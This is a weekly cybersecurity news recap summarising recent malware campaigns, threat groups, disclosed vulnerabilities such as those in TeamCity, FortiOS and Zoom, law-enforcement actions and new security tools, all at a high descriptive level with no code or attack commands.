Our weekly recap of cybersecurity news will keep you posted on the latest developments, exposures, advances, occurrences, threats, and narratives in this field.
It highlights new cyber threats and possible mitigation measures, like revealing emerging malicious techniques that could be used to compromise your systems.
Being up-to-date helps a lot, as you do not have to wait until something happens so that you can put preventive measures in place.
Also, by being constantly aware of cyber security, it is easy to develop a comprehensive knowledge base about various risk areas that help in protecting any network from an ever-changing risk environment.
BunnyLoader 3.0
Evolving malware of BunnyLoader 3.0, which is very fast and has technology that can record keystrokes and other information, as well as credentials and cryptocurrencies.
On February 11, 2024, the creator of BunnyLoader released version 3.0 claiming a performance boost of 90%.
This malware has consistently improved its tactics and evasive techniques that pose significant cybersecurity threats by hindering detection and analysis efforts.
Workings Of MalSync Malware Unveiled
The report on DuckTail and SYS01, also known as MalSync malware, shows that it is a targeted social media credentials theft, data extraction and detection evasion.
It contacts its command-and-control server for updates and instructions. DLL Hijacking attack and Layered Attack strategy, which involves creating scheduled searches to download extra malware.
Its malicious activities become apparent through strange PowerShell command line activity and the existence of certain executable files in the %AppData% directory.
Grandoreiro Banking Malware
Using Group-IB cybersecurity firm, INTERPOL, and Brazil’s help, the authorities managed to successfully disrupt the banking Trojan called ‘Grandoreiro’ by studying the malware samples as well as identifying the sources of attackers.
In January 2024, five administrators were arrested following this operation. This is a trojan that has been active since 2017 and it mainly targeted countries in Latin America that speak Spanish.
It used social engineering via email to steal financial information from people using techniques such as spyware like key logging and screen hijacking.
The operation was executed through a partnership between the three entities whereby they undertook malware analysis, identified the IP address of the C & C server, and disorganized a criminal enterprise.
Hackers Breach Israeli Nuclear Facility Networks
Hackers have claimed to have breached the Israeli Nuclear Facility’s networks, boasting about obtaining thousands of documents like PDFs, emails, and presentations.
Cybersecurity professionals view the hackers’ claims as exaggerated, with the hackers implying a high level of control.
This incident raises concerns about the security of critical infrastructure and highlights the ongoing threats posed by cyberattacks on sensitive facilities.
Kimsuky Group Equipped To Exploit Windows Help Files
In this report, the Kimsuky Group is discussed in terms of their ability to exploit Windows help files with particular interest paid to their adaptability and sophistication concerning cyber threats.
It also uses the phrase “moderate confidence” which suggests commonalities with previous activities and underlines the need for organizations to be watchful and aggressive in terms of cyber security.
The group’s use of Windows help files should remind us all that cyber threats are constantly changing, so we should defend ourselves strongly against advanced attacks like this one.
Invisible Backdoor Attack Dubbed DEBA
A secret door attack called DEBA designed by cybersecurity experts is used to compromise deep neural networks (DNNs) through the implantation of invisible triggers during model training.
It uses singular value decomposition (SVD) to introduce hidden malicious functions, yielding good success rates while ensuring poisoned images maintain good quality.
DEBA is made in such a way that it can bypass all known protective techniques, indicating an era of backdoor attacks that are difficult to identify and hobble the trustworthiness of DNNs.
The attack affects DNNs as they undergo training with patches developing into stealthy and unnoticeable interfaces. Thereby posing substantial challenges for security and credibility in many domains.
TinyTurla Evolved TTPs
TinyTurla, a Russian espionage group that has been active since 2008, seems to be changing its practices constantly.
Recently cyber security researchers from Cisco Talos have found out that the group is utilizing the TinyTurla-NG (TTNG) implant for an ongoing campaign.
Hackers like TinyTurla are constantly adapting their techniques and this indicates that in order to stay ahead of evolving threats and vulnerabilities in the digital landscape, there is need for a constant change in cyber security measures.
Weaponized SVG Files
As a result of the possibility of carrying embedded scripts and bypassing security protocols, hackers are now more frequently using weaponized SVG files in cyber-attacks.
Since 2015 SVG files have been used for malware distribution as well with infections related to ransomware and other malwares like Ursnif and QakBot.
These files can externally deliver malicious content while incorporating smuggling techniques.
To effectively deal with this vector for executing malicious code, it is necessary to improve protection against such a crucial cybersecurity risk as the use of SVG files.
Hackers Exploiting Microsoft Office Templates
Microsoft Office templates have been used by hackers to run harmful programs in a cyberattack campaign named “PhantomBlu” that targets American organizations using phishing emails disguised as messages from an accounting service.
The offenders compose emails with password-protected protected document-attachments and ask their receivers to download them for “monthly salary report.”
Hackers use social engineering and advanced evasion techniques, as they utilize PowerShell dropper and NetSupport RAT as mechanisms for deploying malicious code. For this it is important to know about internet threats and be careful with email attachments in order to safeguard sensitive information more effectively.
900+ Websites Exposing 10M+ Passwords
The report highlights a database exposing over 124 million records, including names, emails, phone numbers, passwords with a significant portion in plaintext, and billing information from more than 900 websites.
While the notable websites were affected by this breach which highlights the alarming scale of sensitive data exposed.
Novel Script-Based Attack
The “Power VBScript Attack” report is about a new script-based attack that exploits PowerShell and VBScript.
It is a new instance of code reuse, with some old stagers, that utilizes communication with certain APIs to link up to Dropbox.
In this script-based attack chain, the Kimsuky group has changed its previous target which was South Korean victims showing a development in their process.
Azorult Malware Abuses Google Sites
Azorult is a information stealer that was discovered in 2016, and this malware can steal sensitive data such as user credentials, browser data and crypto wallet information.
The malware uses different tactics like HTML smuggling via Google Sites to bypass detection and steal data.
Moreover, it also highlights the emergence of Azorult as a major threat that focuses on varied types of confidential information to include crypto wallets and personal documents.
Andariel Hackers Leveraging Remote Tools
Andariel, a subsidiary of North Korea’s Lazarus state-sponsored hacking group has discovered a new remote access trojan (RAT) called EarlyRAT.
DTrack modular backdoor is one tool that Andariel is known for using and it has been associated with different cyber activities such as theft of intellectual property and use of ransomware including Maui.
EarlyRATs are helpful to defenders because they help in identifying compromises by collecting system information and running commands on compromised devices.
In investigating an Andariel campaign which exploited Log4j vulnerabilities and distributed the malware via phishing documents, this RAT was found.
Hackers Attacking Critical US Water Systems
The critical water systems of the United States have recently become a target for hackers, prompting a warning from the White House to increase cybersecurity.
Due to which the White House has called for state governments to evaluate and upgrade cyber security activities among their water systems so as to minimize the dangers involved.
Some significantly posed cyber risks by groups such as the Volt Typhoon on water infrastructure underlining the need for strong response plans during incidents including basic security measures like updating software and default password changes.
Tor Unveils WebTunnel
WebTunnel, an innovation launched by Tor Project, fights against internet censorship. This could be done by use of WebTunnel bridge which can be easily gotten from the Tor Project’s Bridges website and installed on a Tor Browser in order to efficiently bypass censorship.
Tor Project has developed WebTunnel, an effective way to deal with any kind of internet filtering. To overcome this challenge, users must download the WebTunnel bridge that is available on Tor Project’s Bridges site and set it up on the Tor browser to avoid sensitive material.
CISA, NSA, FBI Warn of Volt Typhoon Attacks
CISA, NSA, and FBI, along with international partners have issued a warning about the cyber threat group “Volt Typhoon” which was linked to the People’s Republic of China, targeting U.S. critical infrastructure.
The advisory highlights the group’s activities, successful compromises, and the need for defensive actions to protect national security.
Organizations are urged to prioritize cybersecurity measures, leverage intelligence-informed tools, and align performance management with cyber goals to mitigate the threat effectively.
AcidPour Attacking Linux Systems
The researchers of SentinelLabs in cybersecurity found a new type of malware called AcidPour that targets Linux systems running on x86 architecture.
This one is a bigger version of the famous “AcidRain” and was discovered in an uploaded suspicious Linux binary from Ukraine.
It disrupted services across Europe during Russia’s invasion of Ukraine in 2022 just like AcidRain.
This attack shows how Linux systems are vulnerable to cyber threats, underlining the need for strong security measures for servers, cloud environments, and IoT devices.
Unsaflok Vulnerability
Saflok electronic RFID locks in question are common place in hotels and multi-family housing throughout 131 nations around the world.
It is a vital security flaw that enables cyber attackers to misuse fake keycards to enter over three million hotel rooms worldwide.
This finding has brought up concerns about the safety of hotels and residential buildings, prompting significant modifications of locks, keycards, and front office software to address the vulnerability.
TeamCity Vulnerability
The TeamCity JetBrains is covertly being manipulated by the threat actors through the use of two vulnerabilities, CVE-2024-27198 and CVE-2024-27199. In particular, they are using ransomware campaigns, coinminer malware programs, and backdoors.
For instance, these flaws let hackers evade access controls hence risking server resources and sensitive data or even disrupting vital operations. Rapid 7 discovered the bug leading to the release of version 2023.11.4, which fixed the problem.
As a result, there is an increased risk of exploitation for such vulnerabilities that has been further highlighted by publicly available proof-of-concept exploits challenging the users to update their systems to escape from possible attacks resulting from this security loophole.
One-Click AWS Vulnerability
The vulnerability report “One-Click AWS Vulnerability” by Tenable Research lists an important flaw in the AWS Managed Workflows for Apache Airflow service known as FlowFixation.
It was probable that this vulnerability could permit attackers to be able to get control over a user’s web management panel through simply just one click, leading to remote code execution and lateral movement within the victim’s cloud environment.
Investigation exposed misconfigurations across more than just AWS but also among other top cloud service providers like Azure and Google Cloud Platform underlining the significance of enhancing security posture in configuring clouds.
Critical Zoom Clients Flaw
Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows were found to have a vulnerability (CVE-2024-24691) that allows authenticated attackers to obtain sensitive system information through the network.
The bug indexed under the kind of incorrect input validation can be rated as very severe with a CVSS score of 9.6 and is capable of compromising systems’ confidentiality, integrity, or availability even.
Korenix JetlO 6550 Vulnerability
The report brings out a serious vulnerability, CVE-2024-2371, in the Korenix JetlO industrial Ethernet switches that permit unauthorized access to sensitive information in industrial control systems.
To gain access to vital information like configuration details and network topology, hackers take advantage of flaws in Simple Network Management Protocol (SNMP) implementation.
This gap in security is a major risk for industrial systems’ security and integrity, and for this, there is an urgent need for strong cyber protection measures in industries.
For the protection of critical infrastructure globally, organizations must revisit their security protocols, update them as well as be on the lookout against possible attempts to exploit it by malicious persons.
133,000+ Vulnerable FortiOS/FortiProxy Instances
Fortinet’s FortiOS and FortiProxy have been affected by a very critical security vulnerability tracked “CVE-2024-21762” that has reached over 133000 devices globally.
This flaw allows remote attackers to execute arbitrary code through specially crafted HTTP requests. On the CVSS scale, the severity of this vulnerability is rated at a shocking 9.6 with the possibility of being exploited in the wild.
To avoid being exploited, users are strongly recommended to update their FortiOS and FortiProxy devices to versions that are advised.
Critical RCE Vulnerability in Fortra FileCatalyst
The document points out that an RCE vulnerability is a severe problem with Fortra FileCatalyst Workflow, given a CVSSv3.1 score of 9.8, endangering confidentiality, integrity, and availability.
Fortra has patched the vulnerability in FileCatalyst Workflow version 5.1.6 Build 114 or above and due to this advises users to upgrade to mitigate the risk of CVE-2024-25153.
This flaw permits hackers without verified identity to run any code on servers consequently demanding timely updates for enhanced security.
Chrome 123
With 12 high-severity issues such as CVE-2024-2625, Chrome 123 has been released with security patches for vulnerabilities. In a bid to boost security and user experience, the update is now rolling out slowly to Windows, Mac, and Linux users.
This emphasizes community involvement in cyber security by external researchers who contributed to identifying and fixing these vulnerabilities.
Internally auditing the company’s proactive security approach that leverages fuzzing, Google demonstrates its commitment to safeguarding users.
Hackers are Selling Exploits for Foxit Reader
This cyber security news report focuses on the key problem of hacking and selling out exploits for Foxit Reader, underlining the significance of rapid vulnerability patching.
The pace at which technological advancements in the present world are taking place is so high that it makes it hard to stay ahead of even the most knowledgeable hackers.
Ivanti RCE flaw
In Ivanti Standalone Sentry versions 9.17.0, 9.18.0, 9.19.0, and previous ones there is a Remote Code Execution (RCE) vulnerability that is fundamentally important.
To address this vulnerability, several security researchers and other stakeholders such as Vincent Hutsebaut and Pierre Vivegnis worked side-by-side with Ivanti.
This vulnerability enables attackers to run arbitrary commands on affected systems consequently underlining the significance of promptly installing security updates so as to avoid risks involved in it.
Hackers Steal Fingerprints with Friction Sound
A new cyber threat named ‘PrintListener’ by hackers, which makes use of the sound generated from frictional force between fingers and touch screen to reconstruct users’ fingerprints.
This technique endangers fingerprint authentication systems and may expose personal and financial information. Using recording and analyzing distinctive finger patterns during video chats or phone calls, the method can be used for tricking biometric scanners that are based on fingerprints.
As a result, security researchers have performed this attack on a significant percentage of full as well as partial prints using PrintListener revealing alarming vulnerability in widespread trusted security measures.
Researchers Outline AI’s Malicious Red Teaming
The report examines harmful employment scenarios of AI by threat actors and addresses possible risks relating to AI technologies with deepfakes, influence campaigns, and malware development as examples.
Researchers tried a number of AI models without fine-tuning to show the danger of deep fakes and 2024 social engineering attack vectors.
Creating fake media with the use of AI, impersonation of executives, and exclusion from identification are full of serious cybersecurity challenges that underpin the need for strong security measures against emerging threats in artificial intelligence.
ChatGPT & Bard Are Patching Up JavaScript Flaws
The investigation is focused on the way in which cybersecurity experts assessed ChatGPT and Bard in fixing JavaScript vulnerabilities. The accuracy of ChagpGpt is also higher than that of Bard as it stands at 71.66% versus 68.33%.
Among the twenty bugs within JavaScript, this research produced prompts enabling to test how well AI models repair them automatically. This study underscores the usefulness of ChatGPT for addressing JavaScript vulnerabilities.
E-Root Admin Sentenced To 42 Months In Prison
A 31-year-old man from Moldova named Sandu Boris Diaconu has been jailed for 42 months in a federal prison where he operated E-Root Marketplace, the platform that is notorious for selling stolen computer passwords.
This platform allowed unauthorized entry to computers and servers throughout the world including in the US. This admission by Diaconu led to a major crackdown on cybercrime, revealing the extent of his involvement in a complex operation of online fraud.
Microsoft Announces Major Teams Domain Change
Microsoft is undergoing a major domain change to consolidate Microsoft 365 apps under the cloud.microsoft domain. This transition aims to enhance security, administration, and user experience.
Developers of Teams apps need to update their apps to ensure functionality on the new domain teams.cloud.microsoft by June 2024.
The migration involves trusted domain lists and CDN endpoint changes to support seamless app integration. Failure to update apps may result in rendering issues on the new domain.
Androxgh0st Exploits SMTP Services
A malware, AndroxGh0st is renowned for targeting Laravel applications and later steals login credentials from the .env files associated with AWS and Twilio.
It had initially been referred to as an SMTP cracker but actually breaches a host through exploiting credentials in SMTP, therefore deploys a web shell that scans for vulnerabilities to mine critical information out of Laravel applications.
The malicious software is adaptive and has menu options that highlight several functionalities such as awslimitcheck, sengridcheck, twilio_sender among others which are all aimed at compromising hosts and extracting sensitive data.
US Welcomes Other Countries to Join Fight Against Spyware
In this report, it is already revealed that a group of democratic states, including America and other seventeen countries has formed a unit to fight against the abuse of commercial spyware.
The main aim of this alliance is to shield vulnerable people and institutions, support human rights defenders and reporters as well as upholding democracy all over. The focus here is on ending the expansion and misuse of spyware that presents serious threats to nation-states’ security systems, the privacy of individuals, and global information infrastructure.
To this end, the team underlines strong sharing of data so as to better identify and follow-up commercial surveillance tools for intimidation purposes in the name of fighting such immoral activities like spying on others unsuspectingly.
Microsoft Alerts DevOps Teams of Major Domain Change
Microsoft is notifying DevOps teams about a major domain change, transitioning to a unified cloud.microsoft domain to enhance user experience and streamline development for Teams, Outlook, and Microsoft 365.
Incomplete apps will only function on teams.microsoft.com, with an error message on teams.cloud.microsoft guiding users to the older domain.
This shift aims to improve the overall ecosystem and security of web content embedded in various Microsoft applications.
New GitHub AI-Powered Tool
GitHub has just launched another feature named “code scanning autofix” which exploits GitHub Copilot and CodeQL to mend codes automatically.
This is an inventive way that makes it easier to find security bugs in code and fix them, as well as automate the maintenance and security of code.
The solution seamlessly combines AI functionality from GitHub Copilot with CodeQL’s semantic code analysis engine for detecting and correcting security vulnerabilities. It should also help decrease the number of vulnerabilities that are being created so that more time can be devoted to securing business during rapid development.
AttackGen: AI-Based Incident Response Tool
AttackGen is an AI incident response tool developed by Mathew Adams, the security architect at Santander UK. It is based on large language models and MITRE ATT&CK framework to create customized playbooks that are based on the threat actors selected by a user.
This feature of this tool allows one to select OpenAI API or Azure OpenAI Service for scenario generation to enhance data privacy and customization.
By integrating with MITRE ATT&CK framework, AttackGen enables organizations to better focus on particular segments of a cyber kill chain like ‘Lateral Movement’ or ‘Exfiltration’, thereby improving their defenses against advanced threats.